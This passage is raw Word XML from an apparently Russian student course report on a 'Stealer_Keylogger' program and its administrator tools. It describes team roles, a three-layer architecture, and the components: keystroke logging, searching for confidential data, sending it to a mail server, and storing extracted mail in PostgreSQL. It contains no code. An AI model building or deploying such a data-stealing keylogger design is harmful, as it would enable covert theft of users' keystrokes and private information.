        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC64C74" w14:textId="6C0DE92D" w:rsidR="00C4772E" w:rsidRPr="00C4772E" w:rsidRDefault="00DE2B9A" w:rsidP="00DE2B9A">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc155993237"/>
      <w:bookmarkStart w:id="8" w:name="_Toc155993719"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1 Задачи руководителя</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="65E19B7A" w14:textId="0A355084" w:rsidR="00672333" w:rsidRDefault="00CA3FD7" w:rsidP="00326F6F">
      <w:r>
        <w:t>Роли в команде были распределены следующим образом</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA3FD7">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00672333">
        <w:t>Коротков В.К – руководитель, разработчик</w:t>
      </w:r>
      <w:r w:rsidR="007001A9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00672333">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00672333">
        <w:t>Чуфаров</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00672333">
        <w:t xml:space="preserve"> К.Н – проектировщик, разработчик.</w:t>
      </w:r>
      <w:r w:rsidR="00326F6F">
        <w:t xml:space="preserve"> В виду отсутствия третьего участника команды обязанности разработчика были поделены поровну.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5E9EFC" w14:textId="3D29C584" w:rsidR="00F5444B" w:rsidRPr="00F5444B" w:rsidRDefault="00F5444B" w:rsidP="00326F6F">
      <w:r>
        <w:t>Логины участников</w:t>
      </w:r>
      <w:r w:rsidRPr="00F5444B">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Коротков В.К</w:t>
      </w:r>
      <w:r w:rsidRPr="00F5444B">
        <w:t xml:space="preserve"> - ShadowLance2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Чуфаров</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> К.Н</w:t>
      </w:r>
      <w:r w:rsidRPr="00F5444B">
        <w:t xml:space="preserve"> - blackout16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFD4337" w14:textId="5C739DC3" w:rsidR="004D200D" w:rsidRDefault="004D200D" w:rsidP="004D200D">
      <w:r>
        <w:t xml:space="preserve">В ходе выполнения курсовой работы был организован </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-репозиторий, в котором выполнялся проект</w:t>
      </w:r>
      <w:r w:rsidR="00594160">
        <w:t>, ссылка приложена в списке использованных источников</w:t>
      </w:r>
      <w:r w:rsidR="00594160" w:rsidRPr="00594160">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="_СПИСОК_ИСПОЛЬЗОВАННОЙ_ЛИТЕРАТУРЫ" w:history="1">
        <w:r w:rsidR="00594160" w:rsidRPr="00F637D3">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>[1]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Также были подключены </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>issues</w:t>
      </w:r>
      <w:r>
        <w:t>, которые позволили распределить задания между участниками и на протяжении всей разработки были полезным инструментом контроля выполнения проекта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2869B5" w14:textId="04C0C483" w:rsidR="004D200D" w:rsidRDefault="004D200D" w:rsidP="004D200D">
      <w:r>
        <w:t>Видение продукта было приведено выше в разделе «ВВЕДЕНИЕ».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723F8790" w14:textId="0B74BA18" w:rsidR="00E265A4" w:rsidRDefault="00E265A4" w:rsidP="004D200D">
      <w:r>
        <w:t>По результатам разработки продукта было получено две программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00E265A4">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1813EB16" w14:textId="21E5E471" w:rsidR="00E265A4" w:rsidRPr="000C2E7D" w:rsidRDefault="00E265A4" w:rsidP="000806AE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00E265A4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stealer</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2E7D">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00E265A4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keylogger</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2E7D">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E265A4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основная часть продукта, которая представляет из себя условно-вредоносную часть.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874A237" w14:textId="046A8B26" w:rsidR="00E265A4" w:rsidRPr="000C2E7D" w:rsidRDefault="00DD3E80" w:rsidP="000806AE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD3E80">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2E7D">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3E80">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2E7D">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD3E80">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="000C2E7D">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD3E80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также</w:t>
      </w:r>
      <w:r w:rsidR="000C2E7D" w:rsidRPr="000C2E7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C2E7D">
        <w:t>является</w:t>
      </w:r>
      <w:r w:rsidR="000C2E7D" w:rsidRPr="000C2E7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C2E7D">
        <w:t>основной</w:t>
      </w:r>
      <w:r w:rsidR="000C2E7D" w:rsidRPr="000C2E7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C2E7D">
        <w:t>частью продукта, но исполняет вспомогательную роль к основной программе, представляет из себя нечто вроде интерфейса администратора условно вредоносной программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE2A585" w14:textId="3EE7E99E" w:rsidR="004D200D" w:rsidRPr="004D200D" w:rsidRDefault="00CA23CD" w:rsidP="00CA23CD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc155993238"/>
      <w:bookmarkStart w:id="10" w:name="_Toc155993720"/>
      <w:r>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA23CD">
        <w:t>Функциональная диаграмма продукта как он видится</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="6DB87A27" w14:textId="3B069358" w:rsidR="0081280A" w:rsidRDefault="004007CB" w:rsidP="00326F6F">
      <w:r>
        <w:t xml:space="preserve">Функциональная диаграмма продукта как он видится приложена в соответствующем каталоге в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004007CB">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>репозитории (Руководитель)</w:t>
      </w:r>
      <w:r w:rsidR="003A26FA" w:rsidRPr="003A26FA">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003A26FA">
        <w:t xml:space="preserve">ссылка </w:t>
      </w:r>
      <w:hyperlink w:anchor="_СПИСОК_ИСПОЛЬЗОВАННОЙ_ЛИТЕРАТУРЫ" w:history="1">
        <w:r w:rsidR="003A26FA" w:rsidRPr="003A26FA">
          <w:rPr>
            <w:rStyle w:val="a9"/>
          </w:rPr>
          <w:t>[7]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003A26FA" w:rsidRPr="00B72D6E">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> а также изображена на рисунке 1.</w:t>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="19D9D3CC" w14:textId="59A6A0DF" w:rsidR="004007CB" w:rsidRPr="00470F40" w:rsidRDefault="002104DC" w:rsidP="004007C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676D5" wp14:editId="23B9B1D5">
            <wp:extent cx="4752381" cy="69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4D9" w14:textId="04A46B84" w:rsidR="004007CB" w:rsidRPr="004007CB" w:rsidRDefault="004007CB" w:rsidP="004007CB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 1 – Функциональная диаграмма продукта как он видится</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068AA061" w14:textId="13C8CD0D" w:rsidR="00556F33" w:rsidRDefault="00632FF9" w:rsidP="00AD4C8F">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc155993239"/>
      <w:bookmarkStart w:id="13" w:name="_Toc155993721"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2 Задачи проектировщика</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="58DB9670" w14:textId="5065CE7A" w:rsidR="00556F33" w:rsidRDefault="005A269C" w:rsidP="005A269C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc155993240"/>
      <w:bookmarkStart w:id="15" w:name="_Toc155993722"/>
      <w:r>
        <w:t>2.1 Архитектура продукта и обоснование</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="6453BF4C" w14:textId="77777777" w:rsidR="00FE36CD" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:r>
        <w:t>Для реализации архитектуры продукта выбрана многоуровневая архитектура. В данном случае трёхуровневая.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDEA6F7" w14:textId="77777777" w:rsidR="00FE36CD" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:r w:rsidRPr="00D11998">
        <w:t>Трёхуровневая архитектура</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> продукта</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11998">
        <w:t xml:space="preserve"> состоит и</w:t>
      </w:r>
      <w:r>
        <w:t>з следующие слоёв</w:t>
      </w:r>
      <w:r w:rsidRPr="00070E83">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B84233" w14:textId="77777777" w:rsidR="00FE36CD" w:rsidRPr="00DC1279" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:r>
        <w:t>1. Слой представления</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1279">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>э</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1664B">
        <w:t>тот слой отвечает за взаимодействие пользователя с приложением. Он содержит пользовательский интерфейс, через который пользователь взаимодействует с функциональностью приложения. Включает в себя окна, кнопки, поля ввода и другие элементы, которые пользователь видит и использует для работы с программой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D06ABA" w14:textId="77777777" w:rsidR="00FE36CD" w:rsidRPr="00DC1279" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:r>
        <w:t>2. Слой приложения</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1279">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>э</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1664B">
        <w:t>тот слой содержит бизнес-логику приложения.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A1664B">
        <w:t xml:space="preserve">Он включает компоненты, которые реализуют основные функции </w:t>
      </w:r>
      <w:r>
        <w:t>продукта</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1664B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709B575B" w14:textId="77777777" w:rsidR="00FE36CD" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:r>
        <w:t>3. Слой доступа к данным</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1279">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:t>э</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB7651">
        <w:t xml:space="preserve">тот слой обеспечивает доступ к данным, хранящимся в базе данных. Включает компонент, который управляет взаимодействием с базой данных, осуществляет вставку данных, предоставляет методы для работы с хранилищем информации. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12732C95" w14:textId="77777777" w:rsidR="00FE36CD" w:rsidRPr="00BF71F3" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:r>
        <w:t>Далее следует описание того, какие компоненты продукта на каких слоях будут находиться и какие выполнять функции</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF71F3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782009B" w14:textId="77777777" w:rsidR="00FE36CD" w:rsidRPr="00510CCC" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00510CCC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Слой</w:t>
      </w:r>
      <w:r w:rsidRPr="00510CCC">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00510CCC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>представления</w:t>
      </w:r>
      <w:r w:rsidRPr="00510CCC">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Presentation Layer - UI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015E2828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Administrator_Interface.py:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76CA4">
        <w:t xml:space="preserve"> Пользовательский интерфейс для просмотра данных из базы и управлени</w:t>
      </w:r>
      <w:r>
        <w:t>я некоторыми функциями продукта</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76CA4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143744F3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t>Слой приложения (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00510CCC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Application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>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275CDD85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Stealer_Keylogger.py:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76CA4">
        <w:t xml:space="preserve"> Основной компонент для сбора данных, записи комбинаций клавиш, поиска конфиденциальной информации и отправки данных на почтовый сервер.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Также предоставляет пользователю доступ к статистике собранных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AB01FC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Mails_Extractor.py:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76CA4">
        <w:t xml:space="preserve"> Сервисный компонент для извлечения и фильтрации писем из почтового клиента.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B77E765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lastRenderedPageBreak/>
        <w:t>Слой доступа к данным (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00510CCC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Data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Access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 xml:space="preserve"> - DAL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F4CA6C" w14:textId="77777777" w:rsidR="00FE36CD" w:rsidRPr="00DC1279" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00510CCC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Database_Inserter.py:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76CA4">
        <w:t xml:space="preserve"> Основная роль этого компонента заключается во взаимодействии с базой данных </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в СУБД </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D76CA4">
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D76CA4">
        <w:t xml:space="preserve"> для вставки отфильтрованных данных, полученных от Mails_Extractor.py.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> О</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76CA4">
        <w:t xml:space="preserve">н обеспечивает уровень инфраструктуры для </w:t>
      </w:r>
      <w:r>
        <w:t>получения</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76CA4">
        <w:t xml:space="preserve"> данных </w:t>
      </w:r>
      <w:r>
        <w:t>от других слоёв</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76CA4">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D76CA4">
        <w:t>лежа на границе между бизнес-логикой и доступом к данным.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17066053" w14:textId="4751AEDA" w:rsidR="00FE36CD" w:rsidRPr="00510CCC" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00510CCC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Объединение программ</w:t>
      </w:r>
      <w:r w:rsidR="00510CCC">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAA0C21" w14:textId="32FB18DF" w:rsidR="00FE36CD" w:rsidRPr="007B1637" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:r w:rsidRPr="007B1637">
        <w:t xml:space="preserve">По завершении разработки, программы Mails_Extractor.py, Database_Inserter.py и Administrator_Interface.py </w:t>
      </w:r>
      <w:r w:rsidR="00B96279">
        <w:t>были</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1637">
        <w:t xml:space="preserve"> интегрированы в единое </w:t>
      </w:r>
      <w:r w:rsidR="00B96279">
        <w:t>решение</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1637">
        <w:t xml:space="preserve"> с возможностью взаимодействия с</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> основной</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1637">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">базой данных (СУБД </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B96279">
        <w:t>, название решения</w:t>
      </w:r>
      <w:r w:rsidR="00B96279" w:rsidRPr="00B96279">
        <w:t>: Administrator_Interface_Tools.py</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1637">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A04A7C" w14:textId="7D647568" w:rsidR="00FE36CD" w:rsidRPr="007B1637" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:r w:rsidRPr="007B1637">
        <w:t>Интегрированная программа обеспечив</w:t>
      </w:r>
      <w:r w:rsidR="00AD75A1">
        <w:t>ает</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1637">
        <w:t xml:space="preserve"> следующий функционал:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585635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 xml:space="preserve">Извлечение данных из </w:t>
      </w:r>
      <w:r>
        <w:t>переданной информации</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1637">
        <w:t xml:space="preserve"> через Mails_Extractor.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5C34D2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Вставка отфильтрованных данных в базу через Database_Inserter.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32635393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Просмотр данных из базы, уведомления об изменениях через Administrator_Interface.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278A0E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Общий доступ и управление данными в базе данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC131EF" w14:textId="5A745F5F" w:rsidR="00FE36CD" w:rsidRPr="00510CCC" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:r w:rsidRPr="00510CCC">
        <w:t>Обоснование выбранной архитектуры продукта</w:t>
      </w:r>
      <w:r w:rsidR="00510CCC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A566BB" w14:textId="77777777" w:rsidR="00FE36CD" w:rsidRPr="00336024" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:r w:rsidRPr="00336024">
        <w:t>Трехуровневая архитектура, включающая слой представления, слой приложения и слой доступа к данным, имеет несколько преимуществ, которые обусловлены ее структурой и организацией:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F62E3A9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268"/>
        </w:tabs>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:r w:rsidRPr="002C55A3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Модульность:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC4880F" w14:textId="77777777" w:rsidR="00FE36CD" w:rsidRPr="00336024" w:rsidRDefault="00FE36CD" w:rsidP="00347D26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00336024">
        <w:t xml:space="preserve">Каждый уровень имеет свои задачи и </w:t>
      </w:r>
      <w:r>
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidRPr="00336024">
        <w:t xml:space="preserve">. Это упрощает понимание функциональности и управление кодом, поскольку разные части системы </w:t>
      </w:r>
      <w:r>
        <w:t>осуществляют различные виды деятельности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A49419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>Разделение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на</w:t>
      </w:r>
      <w:r w:rsidRPr="00336024">
        <w:t xml:space="preserve"> сло</w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00336024">
        <w:t xml:space="preserve"> позволяет менять и модифицировать компоненты внутри уровн</w:t>
      </w:r>
      <w:r>
        <w:t>ей</w:t>
      </w:r>
      <w:r w:rsidRPr="00336024">
        <w:t xml:space="preserve"> без влияния на другие части системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D2453F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127"/>
        </w:tabs>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:r w:rsidRPr="002C55A3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Улучшенная </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C55A3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>поддерживаемость</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C55A3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB74446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 xml:space="preserve">Структура слоев делает систему более поддающейся поддержке. Изменения в одном слое редко требуют изменений в других слоях, что уменьшает вероятность ошибок и способствует </w:t>
      </w:r>
      <w:r>
        <w:t>повышению отказоустойчивости</w:t>
      </w:r>
      <w:r w:rsidRPr="00336024">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C308B8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</w:tabs>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:r w:rsidRPr="002C55A3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Повышение безопасности:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C326C23" w14:textId="2113EACB" w:rsidR="00FE36CD" w:rsidRDefault="00FE36CD" w:rsidP="00FE36CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00336024">
        <w:t xml:space="preserve">Четкое разделение уровней </w:t>
      </w:r>
      <w:r>
        <w:t>улучшает</w:t>
      </w:r>
      <w:r w:rsidRPr="00336024">
        <w:t xml:space="preserve"> безопасност</w:t>
      </w:r>
      <w:r>
        <w:t>ь продукта</w:t>
      </w:r>
      <w:r w:rsidRPr="00336024">
        <w:t xml:space="preserve">. Например, изоляция слоя доступа к данным помогает управлять </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">непосредственным </w:t>
      </w:r>
      <w:r w:rsidRPr="00336024">
        <w:t>доступом к базе данных и снижает риск утечек данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14233C20" w14:textId="638027CB" w:rsidR="002C55A3" w:rsidRPr="00336024" w:rsidRDefault="00701A9A" w:rsidP="00701A9A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc155993241"/>
      <w:bookmarkStart w:id="17" w:name="_Toc155993723"/>
      <w:r>
        <w:t>2.2 Требования к системному ПО (ОС, СУБД)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="2E35EE1F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операционной системе:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FCE092" w14:textId="256334B7" w:rsidR="00DA15FE" w:rsidRPr="00AA00F9" w:rsidRDefault="00DA15FE" w:rsidP="00A80C30">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1985"/>
        </w:tabs>
        <w:ind w:left="1134"/>
      </w:pP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 и выше (рекомендуется </w:t>
      </w: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)</w:t>
      </w:r>
      <w:r w:rsidR="00520691">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31401B8E" w14:textId="77777777" w:rsidR="00DA15FE" w:rsidRPr="00AA00F9" w:rsidRDefault="00DA15FE" w:rsidP="00347D26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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совместима с операционными системами </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t>Windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> 10 &amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA00F9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA00F9">
        <w:t xml:space="preserve"> 11.</w:t>
      </w:r>
    </w:p>
